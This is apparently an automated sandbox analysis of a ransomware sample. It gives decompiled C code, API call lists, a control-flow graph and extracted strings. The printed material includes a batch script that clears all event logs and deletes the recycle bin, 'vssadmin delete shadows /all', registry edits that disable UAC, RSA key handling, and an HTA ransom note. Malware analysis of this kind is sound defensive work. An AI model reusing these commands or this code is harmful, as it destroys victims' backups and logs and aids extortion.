					WriteFile( *(_t153 - 0x28), "@echo off\r\nfor /F \"tokens=*\" %%G in (\'wevtutil.exe el\') DO (call:r \"%%G\")\r\ngoto End\r\n:r\r\nwevtutil.exe cl %1\r\ngoto :eof\r\n:End\r\nrd /s /q %systemdrive%\\$RECYCLE.BIN\r\ndel %0", 0xaa, _t153 - 0x34, 0);
					CloseHandle( *(_t153 - 0x28));
					ShellExecuteA(0, "open", "C:\\windows\\clerlog.bat", 0, 0, 0);
				}
			}











    0x0040193b
    0x0040193c
    0x00401941
    0x00401943
    0x00401946
    0x0040194b
    0x00401955
    0x00401956
    0x00401959
    0x0040195b
    0x0040195d
    0x0040195f
    0x00401962
    0x00401967
    0x00401971
    0x00401972
    0x00401977
    0x00401979
    0x0040197b
    0x0040197d
    0x00401980
    0x00401988
    0x00401992
    0x004019a6
    0x004019c1
    0x004019c6
    0x004019cd
    0x004019d0
    0x004019d6
    0x004019dd
    0x004019e0
    0x004019e1
    0x004019e1
    0x004019e3
    0x004019eb
    0x004019ec
    0x004019ed
    0x004019ef
    0x004019f1
    0x004019f3
    0x004019f9
    0x004019fe
    0x00401a01
    0x00401a01
    0x00401a01
    0x00401a0d
    0x00401a10
    0x00401a11
    0x00401a13
    0x00401a1b
    0x00401a1c
    0x00401a1d
    0x00401a1f
    0x00401a21
    0x00401a23
    0x00401a29
    0x00401a34
    0x00401a3e
    0x00401a59
    0x00401a74
    0x00401a7c
    0x00401a81
    0x00401a86
    0x00401a89
    0x00401aa3
    0x00401ab9
    0x00401acf
    0x00401ae5
    0x00401aed
    0x00401b01
    0x00401b1c
    0x00401b2d
    0x00401b33
    0x00401b36
    0x00401b3f
    0x00401b40
    0x00401b43
    0x00401b50
    0x00401b51
    0x00401b52
    0x00401b55
    0x00401b59
    0x00401b5b
    0x00401b63
    0x00401b68
    0x00401b77
    0x00401b90
    0x00401b9f
    0x00401bb4
    0x00401bb9
    0x00401bc0
    0x00401bcc
    0x00401bcd
    0x00401bcf
    0x00401bd0
    0x00401bd9
    0x00401be8
    0x00401bed
    0x00401bf9
    0x00401c04
    0x00401c1d
    0x00401c25
    0x00401c35
    0x00401c47
    0x00401c5c
    0x00401c64
    0x00401c6b
    0x00401c77
    0x00401c83
    0x00401c88
    0x00401c88
    0x00401c8d
    0x00401c92
    0x00401c9e
    0x00000000
    0x00000000
    0x00401d26
    0x00401ca9
    0x00401cb2
    0x00401cb4
    0x00401cc9
    0x00401cc9
    0x00401ce7
    0x00401cfd
    0x00401d05
    0x00401d1c
    0x00401d1c

    APIs
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004), ref: 00401B1C
    • GetSystemTimeAsFileTime.KERNEL32(?,?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000), ref: 00401B63
    • FileTimeToSystemTime.KERNEL32(?,?,?,?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?), ref: 00401B77
    • GetDateFormatA.KERNEL32(00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,@l,?), ref: 00401B90
    • lstrlenA.KERNEL32(<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,@l), ref: 00401B9A
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?,?,?), ref: 00401BB4
    • lstrcatA.KERNEL32(?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS,0000000A,?), ref: 00401BD9
    • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00401BE8
    • lstrcatA.KERNEL32(?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?,dd,MM,yyyy,04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS), ref: 00401BF9
    • lstrcatA.KERNEL32(?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000,?), ref: 00401C04
    • lstrlenA.KERNEL32(?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005,000000FF,004046F4,00000019,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,00000000,00000000), ref: 00401C0A
    • RegSetValueExA.ADVAPI32(?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000,00000005), ref: 00401C1D
    • RegCloseKey.ADVAPI32(?,?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?,\shell\open\command,00000003,00000000), ref: 00401C25
    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00401C35
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?,C:\Windows\System32\mshta.exe ,?), ref: 00401C47
    • ShellExecuteA.SHELL32(00000000,00000000,?,/c vssadmin delete shadows /all,00000000,00000000), ref: 00401C5C
    • GlobalFree.KERNEL32 ref: 00401C64
    • SetErrorMode.KERNEL32(00000001,?,ComSpec,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,"c:\Decoding help.hta",?), ref: 00401C6B
    • Sleep.KERNEL32(00007530,SeRestorePrivilege,00000000,SeBackupPrivilege,00000000,00000001,?,ComSpec,?,000005DC,?,?,00403003,00000000,00000001,?), ref: 00401C92
    • Sleep.KERNEL32(00001388,00007530,00007530,SeRestorePrivilege,00000000,SeBackupPrivilege,00000000,00000001,?,ComSpec,?,000005DC,?,?,00403003,00000000), ref: 00401CA9
    • ShellExecuteA.SHELL32(00000000,open,"c:\Decoding help.hta",00000000,00000000,00000005), ref: 00401CC9
    • CreateFileA.KERNEL32(C:\windows\clerlog.bat,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,SeRestorePrivilege,00000000,SeBackupPrivilege,00000000,00000001,?), ref: 00401CE2
    • WriteFile.KERNEL32(?,@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0,000000AA,00000005,00000000,C:\windows\clerlog.bat,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,SeRestorePrivilege), ref: 00401CFD
    • CloseHandle.KERNEL32(?,?,@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0,000000AA,00000005,00000000,C:\windows\clerlog.bat,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530), ref: 00401D05
    • ShellExecuteA.SHELL32(00000000,open,C:\windows\clerlog.bat,00000000,00000000,00000000), ref: 00401D1C
    Strings
    • SeBackupPrivilege, xrefs: 00401C72
    • \shell\open\command, xrefs: 00401BD3
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open, xrefs: 00401B27
    • EnableLUA, xrefs: 00401AC7
    • ConsentPromptBehaviorAdmin, xrefs: 00401ADD
    • ComSpec, xrefs: 00401C42
    • XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<, xrefs: 00401B2D
    • dd,MM,yyyy, xrefs: 00401B83
    • "c:\Decoding help.hta", xrefs: 00401BFE, 00401CBD
    • C:\windows\clerlog.bat, xrefs: 00401CDD, 00401D10
    • /c vssadmin delete shadows /all, xrefs: 00401C50
    • orsa, xrefs: 00401A51
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 00401A99
    • PromptOnSecureDesktop, xrefs: 00401AB1
    • @l, xrefs: 004019AB, 00401B06
    • 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS, xrefs: 00401B7E
    • SeRestorePrivilege, xrefs: 00401C7E
    • C:\Windows\System32\mshta.exe , xrefs: 00401BF3
    • <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined, xrefs: 00401B95
    • @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0, xrefs: 00401CF5
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$CloseContextFileTime$ExecuteShelllstrcat$AcquireCreateDestroyEncryptExportImportReleaseSleepSystemlstrlen$ByteChangeCharDateEnvironmentErrorFormatFreeGlobalHandleMemoryModeMultiNotifyOpenVariableWideWriteZero
    • String ID: "c:\Decoding help.hta"$/c vssadmin delete shadows /all$04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS$<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined$@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0$@l$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open$C:\Windows\System32\mshta.exe $C:\windows\clerlog.bat$ComSpec$ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\$SeBackupPrivilege$SeRestorePrivilege$XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<$\shell\open\command$dd,MM,yyyy$orsa
    • API String ID: 204179998-3801996818
    • Opcode ID: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction ID: 1140f1e6a0d84ce1b2bbf66032a6f78f9ab0211b56a4c443091a9b8f8d6dd5e8
    • Opcode Fuzzy Hash: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction Fuzzy Hash: 40A1D271B843097AEB21AB91CC43FDD7A79AB44B19F20403AF700790F1D7F96A149A6D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 004017A2, Relevance: 114.2, APIs: 64, Strings: 1, Instructions: 415registryencryptionstringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 4017a2-4017d8 call 401781 GetModuleFileNameA lstrcmpiA 3 4017da-401848 RegOpenKeyExA lstrlenA RegSetValueExA lstrlenA RegSetValueExA RegCloseKey CopyFileA 0->3 4 40184d-40188a RegOpenKeyExA RegQueryValueExA 0->4 3->4 5 4018c8-4018d7 CryptAcquireContextA 4->5 6 40188c-401893 4->6 8 4018dc-4018de 5->8 6->5 7 401895-4018b8 RegQueryValueExA 6->7 7->5 9 4018ba-4018c1 7->9 10 4018e0-4018ea GetLastError 8->10 11 401938-4019d0 CryptGenKey CryptExportKey * 2 CryptDestroyKey CryptReleaseContext CryptAcquireContextA CryptImportKey 8->11 9->5 12 4018c3 9->12 13 4018ec-40191a GetEnvironmentVariableA ShellExecuteA Sleep 10->13 14 40191e-401923 10->14 15 4019d6-401a04 CryptEncrypt 11->15 16 401a79-401b3a RegCloseKey RtlZeroMemory RegOpenKeyExA RegSetValueExA * 3 RegCloseKey CryptAcquireContextA CryptImportKey 12->16 13->5 14->11 17 401925-401936 CryptAcquireContextA 14->17 15->15 18 401a06-401a74 CryptEncrypt CryptDestroyKey CryptReleaseContext RegSetValueExA * 2 15->18 19 401b3f-401b45 16->19 17->8 18->16 20 401b4a-401b55 19->20 20->20 21 401b57-401b59 20->21 21->19 22 401b5b-401c83 GetSystemTimeAsFileTime FileTimeToSystemTime GetDateFormatA lstrlenA MultiByteToWideChar lstrcatA RegCreateKeyA lstrcatA * 2 lstrlenA RegSetValueExA RegCloseKey SHChangeNotify GetEnvironmentVariableA ShellExecuteA GlobalFree SetErrorMode call 401de7 * 2 21->22 26 401c88 call 4016ff 22->26 28 401c8d-401c9e Sleep 26->28 29 401ca4-401cb2 Sleep 28->29 30 401d26 28->30 31 401cb4-401cc9 ShellExecuteA 29->31 32 401cce-401d21 CreateFileA WriteFile CloseHandle ShellExecuteA 29->32 30->28 31->32 32->26
    C-Code - Quality: 65%
    			E004017A2() {
				struct _SYSTEMTIME _v20;
				struct _FILETIME _v28;
				long* _v32;
				void* _v36;
				char* _v40;
				long* _v44;
				int _v48;
				int _v52;
				long _v56;
				void* _v60;
				CHAR* _t88;
				int _t90;
				int _t98;
				long _t158;
				void* _t186;
				void* _t192;
				char* _t195;
				CHAR* _t196;
				void* _t197;
				void* _t201;

				_v60 = 0;
				_t88 = E00401781(0x8000); // executed
				_v40 = _t88;
				GetModuleFileNameA(0, _t88, 0x8000); // executed
				_t90 = lstrcmpiA("hy:@", _v40); // executed
				if(_t90 != 0) {
					RegOpenKeyExA(0x80000002, 0x4039af, 0, 0xf013f,  &_v36); // executed
					RegSetValueExA(_v36, 0x403a4f, 0, 1, 0x403a56, lstrlenA(0x403a56));
					RegSetValueExA(_v36, 0x403a6d, 0, 1, 0x403a79, lstrlenA(0x403a79));
					RegCloseKey(_v36);
					CopyFileA(_v40, 0x403a79, 0); // executed
				}
				RegOpenKeyExA(0x80000002, 0x40397b, 0, 0xf013f,  &_v36); // executed
				_v52 = 0x114;
				if(RegQueryValueExA(_v36, 0x4037e8, 0, 0, 0x4045e0,  &_v52) != 0 || _v52 != 0x114) {
					goto L7;
				} else {
					_v52 = 0x500;
					if(RegQueryValueExA(_v36, 0x4037e9, 0, 0, 0x4040e0,  &_v52) != 0 || _v52 != 0x500) {
						while(1) {
							L7:
							_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
							while(_t98 == 0) {
								_t158 = GetLastError();
								if(_t158 != 0x80090019) {
									if(_t158 != 0x8009000f) {
										break;
									}
									_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 8);
									continue;
								}
								GetEnvironmentVariableA(0x40380f, _v40, 0x5dc);
								ShellExecuteA(0, 0, _v40, 0x4038e1, 0, 0);
								Sleep(0x64);
								goto L7;
							}
							_push( &_v32);
							_push(0x8000001);
							_push(1);
							_push(_v44);
							L00401F86(); // executed
							_v48 = 0x494;
							_push( &_v48);
							_push(_v40);
							_push(0);
							_push(7);
							_push(0);
							_push(_v32);
							L00401F80(); // executed
							_v48 = 0x114;
							_push( &_v48);
							_push(0x4045e0);
							_push(0);
							_push(6);
							_push(0);
							_push(_v32);
							L00401F80();
							CryptDestroyKey(_v32);
							CryptReleaseContext(_v44, 0);
							CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
							CryptImportKey(_v44, 0x403fbf, 0x114, 0, 0, 0x403abb);
							_v56 = 4;
							_t197 = _v40;
							_t186 = 0x4040e0;
							do {
								_v48 = 0xf4;
								asm("cld");
								memcpy(_t186, _t197, 0xf4);
								_t201 = _t201 + 0xc;
								_push(0x500);
								_push( &_v48);
								_push(_t186);
								_push(0);
								_push(0);
								_push(0);
								_push( *0x403abb); // executed
								L00401F7A(); // executed
								_t186 = _t197 + 0x1f4;
								_t39 =  &_v56;
								 *_t39 = _v56 - 1;
							} while ( *_t39 != 0);
							_v48 = 0xc4;
							asm("cld");
							memcpy(_t186, _t197, 0xc4);
							_t201 = _t201 + 0xc;
							_push(0x500);
							_push( &_v48);
							_push(_t186);
							_push(0);
							_push(1);
							_push(0);
							_push( *0x403abb); // executed
							L00401F7A(); // executed
							CryptDestroyKey( *0x403abb); // executed
							CryptReleaseContext(_v44, "true");
							RegSetValueExA(_v36, 0x4037e8, 0, 3, 0x4045e0, 0x114);
							RegSetValueExA(_v36, 0x4037e9, 0, 3, 0x4040e0, 0x500);
							goto L16;
						}
					} else {
						L16:
						RegCloseKey(_v36);
						_push(0x8000);
						_push(_v40);
						L00401EF6();
						RegOpenKeyExA(0x80000002, 0x403940, 0, 0xf013f,  &_v36); // executed
						RegSetValueExA(_v36, 0x4039de, 0, 4, _v40, 4);
						RegSetValueExA(_v36, 0x4039f4, 0, 4, _v40, 4);
						RegSetValueExA(_v36, 0x4039fe, 0, 4, _v40, 4);
						RegCloseKey(_v36);
						CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
						CryptImportKey(_v44, 0x4045e0, 0x114, 0, 0, 0x403abb);
						_v56 = 0x4035b5;
						_v56 = _v56 - 5;
						_push(4);
						asm("lodsd");
						asm("bswap edx");
						asm("xlatb");
						asm("stosb");
						asm("rol edx, 0x6");
						asm("loop 0xfffffff5");
						asm("loop 0xffffffe6");
						 *0x004035B4 = 0x33;
						GetSystemTimeAsFileTime( &_v28);
						_v28.dwHighDateTime = _v28.dwHighDateTime + 0x258;
						FileTimeToSystemTime( &_v28,  &_v20);
						GetDateFormatA(0, 0,  &_v20, 0x403804, 0x403449, 0xa);
						 *0x403ab3 = lstrlenA(0x403006);
						MultiByteToWideChar(3, 0, _v56, 0xffffffff, 0x4046f4, 0x19);
						 *0x4046f4 = 0x2e;
						_t192 = _v40;
						asm("cld");
						memcpy(_t192, _v56, 0x19);
						_t195 = _t192;
						 *_t195 = 0x2e;
						lstrcatA(_t195, 0x4037d4);
						RegCreateKeyA(0x80000000, _t195,  &_v36); // executed
						_t196 =  &(_t195[0x200]);
						lstrcatA(_t196, 0x403a94);
						lstrcatA(_t196, 0x403a56);
						RegSetValueExA(_v36, 0x403003, 0, 1, _t196, lstrlenA(_t196));
						RegCloseKey(_v36);
						SHChangeNotify(0x8000000, 0, 0, 0); // executed
						GetEnvironmentVariableA(0x40380f, _v40, 0x5dc); // executed
						ShellExecuteA(0, 0, _v40, 0x4038c1, 0, 0); // executed
						GlobalFree(_v40); // executed
						SetErrorMode(1); // executed
						E00401DE7(0x403a2a, 0); // executed
						E00401DE7(0x403a3c, 0); // executed
						while(1) {
							E004016FF(); // executed
							while(1) {
								Sleep(0x7530); // executed
								if( *0x403ab7 == 0) {
									break;
								}
							}
							Sleep(0x1388);
							if(_v60 == 0) {
								_v60 = _v60 + 1;
								ShellExecuteA(0, 0x40393b, 0x403a56, 0, 0, 5);
							}
							_v44 = CreateFileA(0x4037ed, 0xc0000000, 0, 0, 4, 0, 0);
							WriteFile(_v44, 0x403817, 0xaa,  &_v56, 0);
							CloseHandle(_v44);
							ShellExecuteA(0, 0x40393b, 0x4037ed, 0, 0, 0);
						}
					}
				}
			}























    0x004017a8
    0x004017b4
    0x004017b9
    0x004017c4
    0x004017d1
    0x004017d8
    0x004017ef
    0x00401810
    0x00401831
    0x00401839
    0x00401848
    0x00401848
    0x00401862
    0x00401867
    0x0040188a
    0x00000000
    0x00401895
    0x00401895
    0x004018b8
    0x004018c8
    0x004018c8
    0x004018d7
    0x004018dc
    0x004018e0
    0x004018ea
    0x00401923
    0x00000000
    0x00000000
    0x00401931
    0x00000000
    0x00401931
    0x004018f9
    0x0040190e
    0x00401915
    0x00000000
    0x00401915
    0x0040193b
    0x0040193c
    0x00401941
    0x00401943
    0x00401946
    0x0040194b
    0x00401955
    0x00401956
    0x00401959
    0x0040195b
    0x0040195d
    0x0040195f
    0x00401962
    0x00401967
    0x00401971
    0x00401972
    0x00401977
    0x00401979
    0x0040197b
    0x0040197d
    0x00401980
    0x00401988
    0x00401992
    0x004019a6
    0x004019c1
    0x004019c6
    0x004019cd
    0x004019d0
    0x004019d6
    0x004019dd
    0x004019e0
    0x004019e1
    0x004019e1
    0x004019e3
    0x004019eb
    0x004019ec
    0x004019ed
    0x004019ef
    0x004019f1
    0x004019f3
    0x004019f9
    0x004019fe
    0x00401a01
    0x00401a01
    0x00401a01
    0x00401a0d
    0x00401a10
    0x00401a11
    0x00401a11
    0x00401a13
    0x00401a1b
    0x00401a1c
    0x00401a1d
    0x00401a1f
    0x00401a21
    0x00401a23
    0x00401a29
    0x00401a34
    0x00401a3e
    0x00401a59
    0x00401a74
    0x00000000
    0x00401a74
    0x004018c3
    0x00401a79
    0x00401a7c
    0x00401a81
    0x00401a86
    0x00401a89
    0x00401aa3
    0x00401ab9
    0x00401acf
    0x00401ae5
    0x00401aed
    0x00401b01
    0x00401b1c
    0x00401b33
    0x00401b36
    0x00401b3f
    0x00401b40
    0x00401b43
    0x00401b50
    0x00401b51
    0x00401b52
    0x00401b55
    0x00401b59
    0x00401b5b
    0x00401b63
    0x00401b68
    0x00401b77
    0x00401b90
    0x00401b9f
    0x00401bb4
    0x00401bb9
    0x00401bc0
    0x00401bcc
    0x00401bcd
    0x00401bcf
    0x00401bd0
    0x00401bd9
    0x00401be8
    0x00401bed
    0x00401bf9
    0x00401c04
    0x00401c1d
    0x00401c25
    0x00401c35
    0x00401c47
    0x00401c5c
    0x00401c64
    0x00401c6b
    0x00401c77
    0x00401c83
    0x00401c88
    0x00401c88
    0x00401c8d
    0x00401c92
    0x00401c9e
    0x00000000
    0x00000000
    0x00401d26
    0x00401ca9
    0x00401cb2
    0x00401cb4
    0x00401cc9
    0x00401cc9
    0x00401ce7
    0x00401cfd
    0x00401d05
    0x00401d1c
    0x00401d1c
    0x00401c88
    0x004018b8

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00008000,00008000), ref: 004017C4
    • lstrcmpiA.KERNEL32(00403A79,?,00000000,00000000,00008000,00008000), ref: 004017D1
    • RegOpenKeyExA.ADVAPI32(80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000,00008000), ref: 004017EF
    • lstrlenA.KERNEL32(00403A56,80000002,004039AF,00000000,000F013F,?,00403A79,?,00000000,00000000,00008000,00008000), ref: 004017F9
